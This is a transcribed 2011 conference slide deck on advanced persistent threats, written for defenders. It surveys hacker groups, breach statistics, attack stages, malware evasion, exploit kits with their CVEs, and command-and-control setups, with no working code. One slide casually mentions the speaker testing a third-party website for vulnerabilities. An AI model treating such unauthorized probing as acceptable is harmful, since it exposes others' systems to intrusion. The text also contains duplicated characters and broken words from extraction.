APT Hartford Oct12
Transcription
APT Hartford Oct12
10/10/2011 Advanced Persistent Threat: The Battle to p0wn Your Network ISACA Greater Hartford Chapter October 12 12, 2011 Page 1 | YYYY MM DD | CONFIDENTIAL Agenda • • • • • • • • • What is advanced persistent threat? Goals of the attacker Stages of APT Why is it hard to catch them? Some examples – deconstructing the hack Lunch/Break Demonstrations What to look for? How can we protect ourselves? Page 2 | YYYY MM DD | CONFIDENTIAL 1 10/10/2011 Assumptions • Any hack can be used to commit an APTstyle y attack – as long g as it is stealthy y enough g • As we only have the one day: – – – – Malware Web exploits - SQL injection Exploiting vulnerabilities in un-patched systems Browser-based exploits Page 3 | YYYY MM DD | CONFIDENTIAL Who am I? • Team Lead (Vulnerability Management & Incident Response) with Bell Aliant: – – – – – P Penetration t ti testing t ti & application li ti security it assessments t Vulnerability research Malware analysis Security Event Monitoring / Incident response Computer forensic investigations • Worked as a Senior Manager for E&Y and KPMG in Security and Forensics • Worked for the Canadian and US DoD as well as numerous utilities and .com companies • Speak at numerous conferences – BlackHat, DefCon, ISACA, HTCIA, Interop, SANS, etc) Page 4 | YYYY MM DD | CONFIDENTIAL 2 10/10/2011 Show of Hands… • What is your role? • What do you want to get out of this session? • Do you believe your organization could be a target of APT? • On a scale of 1-10 1-10, how well do you think your A/V solution is protecting you? Page 5 | YYYY MM DD | CONFIDENTIAL Getting Scary… Page 6 | YYYY MM DD | CONFIDENTIAL 3 10/10/2011 APT IN DEPTH GENERAL TRENDS Page 7 | YYYY MM DD | CONFIDENTIAL “F “From Espionage E i to Sabotage” S b ” (Enrique Salem – President/CEO, Symantec) Page 8 | YYYY MM DD | CONFIDENTIAL 4 10/10/2011 General Trends • • • • • APT is becoming more public We continue to face challenges going forward We have to re-thing our security models Unique malware continues to grow Government & law enforcement are “out gunned” Page 9 | YYYY MM DD | CONFIDENTIAL General Trends • Motivations have changed • The rise of “hacktivism” – Hacking to make a political point – Not just web site tampering – Manipulating the computer and financial infrastructure of a target for political reasons is also a form of hacktivism • The scary thing is that hackers are waging attacks for a very specific reason! • Gone are the days of attacks based solely on the “coolness” factor or the trophy. • There is lots of money to be had in hacking today! Page 10 | YYYY MM DD | CONFIDENTIAL 5 10/10/2011 According to….45 breach cases… • The cost of a data breach as the result of malicious attacks and botnets were more costly and severe. • Organizations are spending more on legal defense costs which can be attributed to increasing fears of successful class actions resulting from customer, consumer or employee data loss. • Average abnormal churn rates across all incidents in the study were slightly higher than last year (from 3.6 percent in 2008 to 3.7 percent in 2009), which was measured by the loss of customers who were directly affected by the data breach event 2010 Ponemon Institute Survey / PGP Corporation Page 11 | YYYY MM DD | CONFIDENTIAL According to….45 breach cases… • The most expensive data breach event included in this year's study cost a company nearly $31 million to resolve. • The least expensive total cost of data breach for a company included in the study was $750,000. 2010 Ponemon Institute Survey / PGP Corporation Page 12 | YYYY MM DD | CONFIDENTIAL 6 10/10/2011 According to….531 respondents… • Malware infection continued to be the most commonly seen attack, with 67.1 percent of respondents reporting it. • Of the approximately half of respondents who experienced at least one security incident last year, fully 45.6 percent of them reported they’d been the subject of at least one targeted ta geted attac attack. • Fewer respondents than ever are willing to share specific information about dollar losses they incurred 2010-11 CSI Survey Page 13 | YYYY MM DD | CONFIDENTIAL According to….531 respondents… 1. Basic attacks – – – Phishing Simple port scans Brute force password scans 2. Malware – – Toolkits Attacks to un-patched systems 3 Attacks 2.0 3. 20 – – APT 21.6% of the 2.0 attacks were considered “targeted” 2010-11 CSI Survey Page 14 | YYYY MM DD | CONFIDENTIAL 7 10/10/2011 What are organizations doing? Page 15 | YYYY MM DD | CONFIDENTIAL According to…Verizon… • 92% of breached came from external sources • Only 17% were internal • 50% were due to a hack – and 49% incorporated malware Compromised records by industry group Breaches by Industry G Group 2011 Verizon Breach Report Page 16 | YYYY MM DD | CONFIDENTIAL 8 10/10/2011 APT IN DEPTH THE FACE OF CYBERCRIME Page 17 | YYYY MM DD | CONFIDENTIAL The Face of Cybercrime Page 18 | YYYY MM DD | CONFIDENTIAL 9 10/10/2011 Max Butler (aka Max Vision) • 2nd offence after serving 5 yrs for CC theft • Created Carders Market, an underground for brokering the sale of CCs and personal information • Sentenced to 13 yrs and ordered to pay 27.5M in restitution Page 19 | YYYY MM DD | CONFIDENTIAL Albert Gonzalez • Aka “soupnazi”, “segvec” • Responsible p for the TJX and Heartland CC thefts • 170M CC numbers • Previously was an IT contractor for the US Secret Service ironically o ca y tthe e sa same e people who arrested him • Longest US sentence – 20 yrs in Federal prison Page 20 | YYYY MM DD | CONFIDENTIAL 10 10/10/2011 Anonymous • Inspired by the perceived anonymity under which users p post images g and comments on the Internet • Been around since 2006, but most well known recently (2010-11) for: – HB Gary Hack – Operation Orlando (Universal Orlando Resort website defacement, airport + mayor website defacement) – BofA document release (showing corruption) – Operation Sony (PlayStation Network hack) – Operation BART (Bay Area Rapid Transit hack) Page 21 | YYYY MM DD | CONFIDENTIAL Anonymous – Very Brazen…. • “Hacker Group Anonymous Aims To Destroy Facebook on Nov. 5. 2011” – Due to their relationship with law enforcement Page 22 | YYYY MM DD | CONFIDENTIAL 11 10/10/2011 Anonymous… Operation Facebook Page 23 | YYYY MM DD | CONFIDENTIAL Lulzsec “LOLs-Sec” • 6 core members (Sabu, Topiary, Kayla, T-Flow, Avunit, Pwnsauce) • Does not appear to hack for financial profit • Motivation is to have fun by causing mayhem – “We do things just because we find it entertaining" and that watching the results can be priceless”. • As well as for “hactivism” reasons – When they hacked PBS, they stated they did so in retaliation for what they perceived as unfair treatment of Wikileaks in a Frontline documentary entitled WikiSecrets. • They also claim to be drawing attention to computer security flaws and holes – And they are doing a great job finding them – although they are normally pretty simple flaws (i.e. SQL injection) • Called it “quits” after 50 days on June 25, 2011 Page 24 | YYYY MM DD | CONFIDENTIAL 12 10/10/2011 Lulzsec – They mean what they say! Scary….tried Bill O’Reilly’s site last week – still vulnerable! Page 25 | YYYY MM DD | CONFIDENTIAL Lulzsec…still around? Page 26 | YYYY MM DD | CONFIDENTIAL 13 10/10/2011 Lulzsec • • • • • • • • FOX X-Factor UK ATM Sony Japan PBS Infraguard Porn sites Senate.gov Gaming sites Page 27 | YYYY MM DD | CONFIDENTIAL Antisec Movement • • Made up of members from Anonymous and LulzSec as well as others Mission to expose the governments and their contractors through the "#AntiSec" #AntiSec movement – • • Against security companies that use full-disclosure to profit and develop scare-tactics to convince people into buying their firewalls, anti-virus software and auditing services. Released 400MB of data from US government security contractor ManTech Much of the information appears to be related to projects that ManTech is involved in related to NATO and other security projects. Page 28 | YYYY MM DD | CONFIDENTIAL 14 10/10/2011 Organized Crime / Financial-led Campaigns • Still very common source of APT-type hacks • The Russian Mafia made more money in online banking fraud last year than the drug cartels made selling cocaine • An entire industry has cropped up over the years to support the theft of digital information with players in all aspects of the marketplace. • Hackers who stole bank account details for 200 000 Citigroup customers infiltrated the 200,000 company's system by exploiting a garden-variety security hole in the company's website for credit card users. Page 29 | YYYY MM DD | CONFIDENTIAL State Sponsored • DigiNotar (2011) – Apparently conducted by Iran – Theory was the attack was "used to spy on Iranian Internet users on a large scale scale." • Stuxnet (2010) • Google / Operation Aurora (2010) – US/Israel responsible for attack on Iran? – Attempted theft of Gmail accounts by the Chinese (including those of senior US government officials, Chinese activists and others from S. Korea) – Attacks from Jinan - home to one of six technical reconnaissance bureaus belonging to the People's Liberation Army and a technical college U.S. investigators last year linked to a previous attack on Google Google. • International Monetary Fund (IMF) Hack (2011) – Hacker installed software on a single computer that sent scam e-mails to specific victims – The sophisticated nature of the attack and the resources required to execute it indicate a nation-state was involved Page 30 | YYYY MM DD | CONFIDENTIAL 15 10/10/2011 State Sponsored • China’s Underground (NY Times – Majia Interview) • “There are the intelligence-oriented hackers inside the P People’s l ’ Lib Liberation ti A Army, as wellll as more shadowy h d groups that are believed to work with the state government.” • “Computer hacking has become something of a national sport…There are hacker conferences, hacker training academies and magazines .” Page 31 | YYYY MM DD | CONFIDENTIAL State Sponsored • “Microsoft and Adobe have a lot of zero days,” he said, while scanning Web sites at home. “But we don’t publish them We want to save them so that some day we can use them. them.” • When asked whether hackers work for the government, or the military, he says “yes.” Page 32 | YYYY MM DD | CONFIDENTIAL 16 10/10/2011 APT IN DEPTH CYBERCRIME IS EVOLVING Page 33 | YYYY MM DD | CONFIDENTIAL Cybercrime is Evolving • Vulnerability discoverers most important & SW/HW vendors introducing vulnerabilities no vulnerabilities, no hack,, no breach. • Eliminates 99% of the rest of the cybercrime world Stuart McClure - McAfee Page 34 | YYYY MM DD | CONFIDENTIAL 17 10/10/2011 Cybercrime is Evolving Stuart McClure - McAfee Page 35 | YYYY MM DD | CONFIDENTIAL Target Has Evolved Different issues then! Page 36 | YYYY MM DD | CONFIDENTIAL 18 10/10/2011 Vehicles have changed etc… Page 37 | YYYY MM DD | CONFIDENTIAL Rising Tide of Cyber Espionage Page 38 | YYYY MM DD | CONFIDENTIAL 19 10/10/2011 Wide Range of Victims Page 39 | YYYY MM DD | CONFIDENTIAL Browser Continues to be the Target Page 40 | YYYY MM DD | CONFIDENTIAL 20 10/10/2011 High Profile Attacks Increasingly Common Page 41 | YYYY MM DD | CONFIDENTIAL The Evolving Threat Landscape • # of threats are up 5X • Nature of threats changing – From broad, scattershot to focused, targeted Pace of advanced attacks accelerating • High profile attacks common place – Citicorp, Sony, Epsilon, RSA, Adobe, Morgan Stanley, Lockheed, L-3, PBS, Google… Page 42 | YYYY MM DD | CONFIDENTIAL 21 10/10/2011 Hacktivism • Wikipedia - “The nonviolent use of illegal or legally g y ambiguous g digital g tools in p pursuit of political ends.” • What should or should not be in the world… • Many techniques used by hacktivists: – – – – – Defacements Redirects DoS Data theft Web site parodies Page 43 | YYYY MM DD | CONFIDENTIAL Items that Have Caused our Demise… • • • • • • To much reliance on Antivirus Social Networking + third party apps “Trusting” all our outbound traffic Sloppy perimeter security Specialized malware URL-shortening services = Phisher’s best f friend • BitTorrent • Improved stealth Botnets Page 44 | YYYY MM DD | CONFIDENTIAL 22 10/10/2011 We’re Doomed… 2010-11 CSI Survey Page 45 | YYYY MM DD | CONFIDENTIAL The Malware Problem… • Malware is difficult to deal with • Exponential growth • Lots are packed and encrypted – hard to automated or blacklist • Any therefore the medium of choice for attackers! Page 46 | YYYY MM DD | CONFIDENTIAL 23 10/10/2011 Malware Samples by Month Steady increase month-to-month since start of 2010… McAfee 2011 Q2 Threat Report Page 47 | YYYY MM DD | CONFIDENTIAL 2011 Q2 – Total Malware Samples Steady climb….22% increase over 2010 On track to 75M samples by EOY! McAfee 2011 Q2 Threat Report Page 48 | YYYY MM DD | CONFIDENTIAL 24 10/10/2011 2011 Q2 – Unique Fake-Alert Samples Steady growth again – malware of choice McAfee 2011 Q2 Threat Report Page 49 | YYYY MM DD | CONFIDENTIAL 2011 Q2 – Fake-AV Samples for Apple Development of this malware due to the increase of Apple for business use. iPad or iPhone malware is a case of “when” not “if”! McAfee 2011 Q2 Threat Report Page 50 | YYYY MM DD | CONFIDENTIAL 25 10/10/2011 2011 Q2 – Evil URLs – Delivering Malware - Source McAfee 2011 Q2 Threat Report Page 51 | YYYY MM DD | CONFIDENTIAL 2011 Q2 – Evil URLs – Delivering Malware McAfee 2011 Q2 Threat Report Page 52 | YYYY MM DD | CONFIDENTIAL 26 10/10/2011 How malware is bypassing security technology • • • • • • • • Target browser & plug-in vulnerabilities Zero-day Zero day exploits Obfuscated javascript Polymorphic payloads Frequently changing, dynamic domain names Encrypted communications Compromise legitimate Web sites Social Engineering Page 53 | YYYY MM DD | CONFIDENTIAL APT IN DEPTH WHAT IS AN APT? Page 54 | YYYY MM DD | CONFIDENTIAL 27 10/10/2011 Introduction • APT is really a “flashy term” vendors and the like are using g to categorize g attacks that I refer to as a “targeted attack”. • Term coined by the USAF in 2006 • That is to say, as opposed to attacks that are considered “crimes of opportunity”, these attackss are attac a e very e y well e thought t oug t out, based o on a specific goal. Page 55 | YYYY MM DD | CONFIDENTIAL Introduction • The use of the acronym APT: – Advanced – The attacker is much more skilled, experienced , highly organized and usually funded when conducting an APT campaign. – Persistent – These are not crimes of opportunity. Focus is on gaining long term control of an organizations network & data. Attackers maintain the level of interaction needed to execute their objectives (i.e. backdoors). – Threat - The attacker is conducting this campaign based on a very specific ifi goall – this thi is i nott like lik malware l th thatt h has no reall purpose (but to be annoying), they are after something specific (i.e. IP, access to your network, etc.) Page 56 | YYYY MM DD | CONFIDENTIAL 28 10/10/2011 Motive of the Attacker • Political and/or military objective – Suppress government ((i.e. “Hacktivism”)) g • Economic objective – Stealing something of value – intellectual property • Technical (i.e. contractors) objective – They need to hack you as part of a larger goal (i.e. RSA S attack attac to get Secu SecurID information, o at o , source sou ce code, etc.) • Critical infrastructure such as power grid, water supply, telecom SCADA (i.e. Stuxnet) Page 57 | YYYY MM DD | CONFIDENTIAL What is an APT? • Many make the mistake of thinking attacks are transient – that they y come and g go • Attackers want to take advantage of economy of scale and break into as many places as possible, as quickly as possible. • Therefore the tool of choice of an attacker is automation. auto at o • Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break in very quickly Page 58 | YYYY MM DD | CONFIDENTIAL 29 10/10/2011 What is an APT? • Old school attacks were about giving the victim some visible indication of a compromise. • Today it is all about not getting caught. • Stealth and being covert are the main goals of today’s attacks. • The goal of these attacks are to look as close — if not identical — to legitimate traffic. The difference is so minor that many security devices cannot differentiate between them Page 59 | YYYY MM DD | CONFIDENTIAL What is an APT? • Attack’s goal is to provide some significant benefit to the attacker ((i.e. economic,, political, financial gain). • Focus will be all about the data. • Anything that has value to an organization means it will have value to an attacker. • and with the increasing popularity oData has become portable f cloud computing it is now available through the Internet. Page 60 | YYYY MM DD | CONFIDENTIAL 30 10/10/2011 What is an APT? • Attackers do not just want to get in and leave, they y want long g term access. • If someone is going to spend effort breaking in to an organization, they will make sure they can keep that access for a long period of time. • Stea Stealing g data once o ce has as value, a ue, but stealing stea g data for nine months gives the attacker even more payoff. Page 61 | YYYY MM DD | CONFIDENTIAL What is an APT? • Advanced nations are under constant cyber attack. This is not a future threat,, this is now. This has been going on for YEARS. • Cyber “Cartels” are rapidly growing to surpass Drug Cartels in their impact on Global Security – The scope of finance will surpass drug cartels – The extent of the operation internationally Page 62 | YYYY MM DD | CONFIDENTIAL 31 10/10/2011 What is an APT? Page 63 | YYYY MM DD | CONFIDENTIAL What is an APT? • MI5 says the Chinese government “represents one of the most significant g espionage p g threats” Page 64 | YYYY MM DD | CONFIDENTIAL 32 10/10/2011 APT IN DEPTH WHY IS IT SO HARD TO CATCH THEM? Page 65 | YYYY MM DD | CONFIDENTIAL Why is it hard to catch them? • Hard to catch a moving target – we see attempts p from different IPs and they y change g very frequently • Inability to Detect “Low and Slow” Attacks – Non-predictable traffic patterns • Hard to detect “bad” traffic when it is in plain sight s g t – HTTP,, HTTPS S Page 66 | YYYY MM DD | CONFIDENTIAL 33 10/10/2011 Why is it hard to catch them? • Organizations have such a large footprint infrastructure wise that they y cannot secure and keep secure every last area • Weak web application security • Lack of monitoring controls – people don’t know data is missing (until it is up on pasteb ) “pastebin”) • Blocking against zero day • Lack of education in organizations – Spear phishing Page 67 | YYYY MM DD | CONFIDENTIAL Zero-day threats • 4 times more zero day threats than in 2010 • Vulnerabilities in systems and applications that the vendor is unaware about • They do exist, and someone out there knows about them • Used in APTs to breach organizations’ networks are otherwise very secure Page 68 | YYYY MM DD | CONFIDENTIAL 34 10/10/2011 APT IN DEPTH ANATOMY OF AN APT Page 69 | YYYY MM DD | CONFIDENTIAL Step 1 - Reconnaissance • Attackers will watch and take notes on who in an organization g they y need to target, g , from administrative assistants to executives. • Much of this information is gleaned from public Web sites, DNS recon, etc. • Map org chart (Identify attack targets) • Social reconnaissance (acquire email email, IM IM, etc.) • Recruit, blackmail insiders Page 70 | YYYY MM DD | CONFIDENTIAL 35 10/10/2011 Step 2 – Initial Breach • They will use spear-phishing attacks to send those identified targets an attachment with an exploit l it that th t can be b used d tto hij hijack k th the ttarget's t' system (malicious PDF, DOC, etc. w/shellcode) • Any personal information the attacker knows about the source will be used to entice the target user to open the attachment. • Candy drops around the building (Thumb drives, DVD’ ) DVD’s) • Gain physical access (impersonate cleaning crew, etc.) Page 71 | YYYY MM DD | CONFIDENTIAL Step 3 – Establish Covert Backdoor • Gain elevated user privileges • Laterally move within network & establish backdoors • Inject additional Malware • Install rootkits, RATs, etc. Page 72 | YYYY MM DD | CONFIDENTIAL 36 10/10/2011 Step 4 – Establish C&C Infrastructure • Grab credential and use these to log-on to end p point systems, y , and siphon p data. • Now the network is being peppered with backdoors, tools to grab passwords, steal emails, and footprint the network • Establish encrypted SSL tunnel – Covert channel c a e Page 73 | YYYY MM DD | CONFIDENTIAL Step 5 – Complete Objectives/Exfiltrate • Ex-filtrate Intellectual Property, Trade Secrets data, • Imagine anything from financial data marketing plans, research and development information - and transferring that information to an external server under the attackers control • Install sta Trojans oja s in source sou ce code • Control critical systems Page 74 | YYYY MM DD | CONFIDENTIAL 37 10/10/2011 Step 6 – Maintain Persistence • Revamp Malware to avoid detection • Utilize other attack methods to maintain presence • Continue monitoring networks, users, data Page 75 | YYYY MM DD | CONFIDENTIAL Step 7 – Public Distribution (optional) Page 76 | YYYY MM DD | CONFIDENTIAL 38 10/10/2011 Anatomy of an APT MALWARE, BOTNETS AND RATS…OH MY! Page 77 | YYYY MM DD | CONFIDENTIAL Malware Goal • All Malware basically does the same stuff – – – – – Compromise a machine undetected Gain complete control Identify & acquire “target” information Attempt ex-filtration of information Remain undetected - until target info is acquired + as long as possible Page 78 | YYYY MM DD | CONFIDENTIAL 39 10/10/2011 Infection Lifecycle of a Typical Botnet Page 79 | YYYY MM DD | CONFIDENTIAL Malware Facts…. • APT Malware: • Most Common APT Filenames: – Average File Size: 121.85 KB – – – – • svchost.exe (most common) iexplore.exe iprinp.dll wiinzf32.dll APT Malware avoids anomaly detection through: – Outbound HTTP connections – Process injection – Service persistence • APT Malware Communication: – 100% of APT backdoors made only outbound connections – 83% used TCP port 80 or 443 – 17% used another port Page 80 | YYYY MM DD | CONFIDENTIAL 40 10/10/2011 Malware Evasion Tactics • Common techniques: – – – – – – – – – Compression p Obfuscation Polymorphism Internal encryption Stealth tactics Dynamic memory residence Armoring Anti-code debuggers Kernel alterations Page 81 | YYYY MM DD | CONFIDENTIAL Defining Advanced Malware • We can see the evolution • Next generation of threats – – – – – U k Unknown Targeted Polymorphic Dynamic Personalized • Leverage zero-day vulnerabilities, commercial quality lit toolkits, t lkit social i l engineering tactics • Often targets IP, credentials or other networked assets Page 82 | YYYY MM DD | CONFIDENTIAL 41 10/10/2011 Conventional vs. Modern, APT Malware • Conventional Malware – Characterized by y using g “spreading” p g techniques, q , custom – C&C transport protocols, IRC communication – Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots – Detectable through a variety of technologies/tactics: NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS – Port scanning, g, high g windows p port activity, y, non-http p over port 80, non-web traffic, etc. Page 83 | YYYY MM DD | CONFIDENTIAL Conventional vs. Modern, APT Malware • Modern-ish malware – Characterized by y infecting g via browser based exploits p – Exploit Channel: PDF, Flash, IE/FireFox, QuickTime, C&C – Callback over HTTP(s) – Malware: ZeuS, Gozi, Koobface, Rustock, Spyeye – Partially detectable through manual traffic analysis fairly y easily, y, but a full time resource is needed Page 84 | YYYY MM DD | CONFIDENTIAL 42 10/10/2011 Collapse of Current Technologies • AV (Symantec, McAfee, Trend) bypassed by – – – • URL Filtering (Cisco, Blue Coat, WebSense) bypassed by – – – • Dynamic zero-day malware Targeted attacks Polymorphic malware Dynamic domain names & URLs Compromised legitimate Web Sites Spear Phishing with embedded URL’s IPS (Cisco, McAfee, TippingPoint, SourceFire) bypassed – – – Signatures for reactive threats Heuristics are too noisy - high FP/FN rate Can’t stop Targeted Malware Page 85 | YYYY MM DD | CONFIDENTIAL What About AV? “Even after 30 days, many AV vendors cannot detect known attacks, making it critical for enterprises to take a more proactive approach to online security in order to minimize the potential for infection,” - Panos Anastassiadis (COO, Cyveillance) Page 86 | YYYY MM DD | CONFIDENTIAL 43 10/10/2011 Malware Can Defeat Sophisticated Defenses - Encryption • Just because your laptops and critical data may be b encrypted t dd doesn’t ’t mean your enterprise more secure than before – If you can access your laptop’s encrypted data, then that means… – …so too can a Trojan Horse which borrows your Windows logon credentials • Trojans enable knowledgeable hackers to bypass both strong encryption and sophisticated defenses alike in order to steal sensitive data. Page 87 | YYYY MM DD | CONFIDENTIAL New Direction for Malware • Malicious code used in APT attacks are usually: – Not “sexy” –the simple techniques work well! – To some extent, custom • Not widely disseminated = not picked up by AV • Not necessarily custom code but custom “packaging” – Highly targeted • Mostly a factor of the delivery mechanism, spearphishing email, web link, etc. – Modular • Monolithic binary is risky; reveals too much about the MO, capabilities of the attacker Page 88 | YYYY MM DD | CONFIDENTIAL 44 10/10/2011 Modular….what’s That? • Historically your neighborhood script kiddie had one of two choices for his exploitation tools: – The Unix way: a lot of tools, each one does a certain function very, very well – The Microsoft Word way: one tool to rule them all, contains all the functionality plus the kitchen sink • However both of these techniques have drawbacks – The Unix way inevitably leads to tools that have vastly different interfaces, interfaces difficult learning curve – The Word way helps ensure a consistent interface but exposes all of your capabilities at once to the malware analyst Page 89 | YYYY MM DD | CONFIDENTIAL Modular Implants vs. Memory Analysis • These modular implants pose a significant challenge to the incident responder – No longer is the entire binary (or binaries) available for viewing and analysis from the disk – Now we must fuse together the results of traditional malware analysis with the volatile data acquisition • Malware authors will continue to improve in this arena – Freeing unused memory as soon as it is no longer necessary – Zeroing out sensitive memory areas after use • Will need more research and development to keep pace with the malicious code authors! Page 90 | YYYY MM DD | CONFIDENTIAL 45 10/10/2011 APT IN DEPTH FORMS OF MALWARE Page 91 | YYYY MM DD | CONFIDENTIAL Rogueware • Rogue security software (i.e. FakeAV) • 35M computers infected every month with a form of rogueware • Many victims pay for these programs, $50$70, and stats show how bad guys are making upwards of $34M a month with this scam sca • Many are fake anti-virus scanners Page 92 | YYYY MM DD | CONFIDENTIAL 46 10/10/2011 Rogueware Page 93 | YYYY MM DD | CONFIDENTIAL Rogueware Page 94 | YYYY MM DD | CONFIDENTIAL 47 10/10/2011 Twitter / Facebook • Koobface – Links to malicious websites in Twitter & FB • Linked to sites that would install malware e - Message essage to • I.e. view a video – Flash Player update needed = Malware Page 95 | YYYY MM DD | CONFIDENTIAL The Risks: Koobface in Action Page 96 | YYYY MM DD | CONFIDENTIAL 48 10/10/2011 The Risks: Koobface in Action Less than 10 minutes later! Page 97 | YYYY MM DD | CONFIDENTIAL The Risks: Koobface in Action Page 98 | YYYY MM DD | CONFIDENTIAL 49 10/10/2011 The Risks: Koobface in Action Page 99 | YYYY MM DD | CONFIDENTIAL The Risks: Koobface in Action Page 100 | YYYY MM DD | CONFIDENTIAL 50 10/10/2011 The Risks: Koobface in Action Page 101 | YYYY MM DD | CONFIDENTIAL Movie Anyone? • Torrent download • Need a codec • Download the codec, and your machine is infected • Your .rar archive is password protected, protected go to this link for the password. Page 102 | YYYY MM DD | CONFIDENTIAL 51 10/10/2011 Adobe Zero Day • Exploits in Flash, Acrobat = Cross platform • Open p a PDF that has bad shellcode in it with a vulnerable version of Reader • Forced to release out-of-band patches • 2010 McAfee Labs counted 214,992 pieces of malware aimed at vulnerabilities in Adobe Acrobat and Reader. • In contrast contrast, only 2,227 2 227 malware attacked vulnerabilities in Microsoft Office products. • Still lots of organizations with old versions out there Page 103 | YYYY MM DD | CONFIDENTIAL Adobe Zero Day • Example - TROJ_PIDIEF.WX ( (CVE-2009-0927) ) – The PDF document contains heavily encrypted java script which has a malicious shellcode. – Downloads a malicious file from the site http://xxxx com/geed/geed exe http://xxxx.com/geed/geed.exe Page 104 | YYYY MM DD | CONFIDENTIAL 52 10/10/2011 Adobe Zero Day • “I have deployed a newer version…no p problem!” – End user grabs a copy of Adobe Acrobat (only licensed version I have is v7.0 or user installs scanner software package… – End user installs this – old version of reader installed along with writer Page 105 | YYYY MM DD | CONFIDENTIAL AutoRun (USB) • Made popular by Conficker autorun inf to change • Use of autorun.inf, the options • Attackers manipulate the options in the popup • Better with Windows 7 Page 106 | YYYY MM DD | CONFIDENTIAL 53 10/10/2011 Password Stealing Trojans (i.e. Zeus) • Targeted mostly financial organizations • Big hit on BofA in 2010 • Keystroke monitoring trojan Page 107 | YYYY MM DD | CONFIDENTIAL Remote Access Tools (RATs) • Poison Ivy, Nuclear RAT, etc. y • Provide Remote access to systems • Remote registry, screen grab, keystroke log, CMD shell, shutdown, file viewer, etc. Page 108 | YYYY MM DD | CONFIDENTIAL 54 10/10/2011 DNS Hijack Malware • Resets you DNS server settings attacker’s s DNS • Points you to an attacker • Resolves common sites (i.e. Google.com) to attackers address • Download malware from there • Lots of organizations do not block outbound DNS resolution • Becoming popular with Apple products Page 109 | YYYY MM DD | CONFIDENTIAL APT In Depth MALWARE DISTRIBUTION Page 110 | YYYY MM DD | CONFIDENTIAL 55 10/10/2011 Booby trapped Documents 2010 Greg Hoglund Page 111 | YYYY MM DD | CONFIDENTIAL Drive-by-Malware (Web based Attack) 2010 Greg Hoglund Page 112 | YYYY MM DD | CONFIDENTIAL 56 10/10/2011 Trap Postings 2010 Greg Hoglund Page 113 | YYYY MM DD | CONFIDENTIAL Trap Postings 2010 Greg Hoglund Page 114 | YYYY MM DD | CONFIDENTIAL 57 10/10/2011 SQL Injection 2010 Greg Hoglund Page 115 | YYYY MM DD | CONFIDENTIAL Reflected Injection (XSS) 2010 Greg Hoglund Page 116 | YYYY MM DD | CONFIDENTIAL 58 10/10/2011 Three Step Infection 2010 Greg Hoglund Page 117 | YYYY MM DD | CONFIDENTIAL Payload Server • A machine that has the actual malware dropper pp ready y for download • The exploit server will redirect the victim to download a binary from this location 2010 Greg Hoglund Page 118 | YYYY MM DD | CONFIDENTIAL 59 10/10/2011 APT in Depth MALWARE TOOLKITS Page 119 | YYYY MM DD | CONFIDENTIAL Malware Toolkits • Those that don’t want to sell malware sell the means to help build malware: • • • • • • • • • • • ZoPack El-Fiesta IcePack Neosploit AdPack Zeus SpyEye Tornado Eleonore Dragon Pack Bleeding Life Page 120 | YYYY MM DD | CONFIDENTIAL 60 10/10/2011 Malware Toolkit Exampe - IcePack • Old-ish, but a classic example • According to the toolkit creator, the exploitation rate of this toolkit in 2009 was 50% for R ssian visitors Russian isitors and 20% for all of the visitors. He asks for $400 for the toolkit. Page 121 | YYYY MM DD | CONFIDENTIAL Malware Toolkit Example - IcePack • Builds malware to take advantage of: – MDAC - CVE-2006-0003 – Windows Media Player plug-in for Firefox and Opera CVE-2006-0005 – WebViewFolderIcon ActiveX - CVE-2006-3730 – VML - CVE-2006-4868 – Winzip FileView ActiveX - CVE-2006-6884 – QuickTime RSTP - CVE CVE-2007-0015 2007 0015 Page 122 | YYYY MM DD | CONFIDENTIAL 61 10/10/2011 Malware Toolkits - Zeus Nice user-friendly interface☺ Page 123 | YYYY MM DD | CONFIDENTIAL Malware Toolkits – Zeus Trojan • 55% of Zeus-infected systems had up-to-date AV • User-friendly U f i dl • Attacker can search collected data for cookies, files, contents of HTTP requests, FTP logons, etc. • The files collected by Zeus were typically stored on compromised servers • Sold S for f as low as $250 $2 0 ((with support!)) • One variant had C&C running on Amazon’s EC2 cloud Page 124 | YYYY MM DD | CONFIDENTIAL 62 10/10/2011 Malware Toolkit Example - Spy Eye • Very similar to Zeus, but not as advanced • Botnet toolkit • $500 USD • Invisible as a service, in the registry and files • Captures data from IE and Firefox Page 125 | YYYY MM DD | CONFIDENTIAL Malware Toolkits • Sites dedicated to exchanging malware • Tips/tricks on developing malware. • Many of these sites maintained by the Russians Page 126 | YYYY MM DD | CONFIDENTIAL 63 10/10/2011 Zeus source code for the latest version 2.0.8.9 for $100k in 2010! Page 127 | YYYY MM DD | CONFIDENTIAL Eleonore (exploit pack) • PDF pack – – – – • MS Internet Explorer Exploits – – • MS09-002 (Internet Explorer 7 exploit 1/2009) MDAC – ActiveX (Internet Explorer exploit, 3/2007) Java – • PDF Brand new PDF Exploit (12/2009) PDF collab.getIcon (4/2009) PDF Util.Printf (11/2008) PDF collab.collectEmailInfo (2/2008) Javad0 (12/2008) – Java Calendar (Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1 4 2 18 and earlier) 1.4.2_18 Firefox – – compareTo – exploit for a Firefox vulnerability from 2005 jno – Exploit for Firefox version 1.5.x (2006) Page 128 | YYYY MM DD | CONFIDENTIAL 64 10/10/2011 Tornado (exploit pack) Page 129 | YYYY MM DD | CONFIDENTIAL Dragon Pack Page 130 | YYYY MM DD | CONFIDENTIAL 65 10/10/2011 Bleeding Life Page 131 | YYYY MM DD | CONFIDENTIAL APT in Depth COMMAND & CONTROL Page 132 | YYYY MM DD | CONFIDENTIAL 66 10/10/2011 Command & Control 2010 Greg Hoglund Page 133 | YYYY MM DD | CONFIDENTIAL Command & Control • Command-and-control systems – – – – Custom p protocols ((like Aurora)) Plain old URL’s IRC (not as common anymore) Stealth / embedded in legit traffic • Machine identification – Store infections in a back-end SQL database Page 134 | YYYY MM DD | CONFIDENTIAL 67 10/10/2011 Command & Control • IRC C&C • IRC control channel for a DDoS botnet • Most of the C&C has moved to the web Page 135 | YYYY MM DD | CONFIDENTIAL Command & Control Page 136 | YYYY MM DD | CONFIDENTIAL 68 10/10/2011 Command & Control Page 137 | YYYY MM DD | CONFIDENTIAL Staging Server • A place to store all the stolen goods before it gets “exfiltrated” g – Data is moved off the network in a variety of ways 2010 Greg Hoglund Page 138 | YYYY MM DD | CONFIDENTIAL 69 10/10/2011 Drop Site • Sometimes the stolen data is moved to a tertiary y system, y , not the same as the C&C. 2010 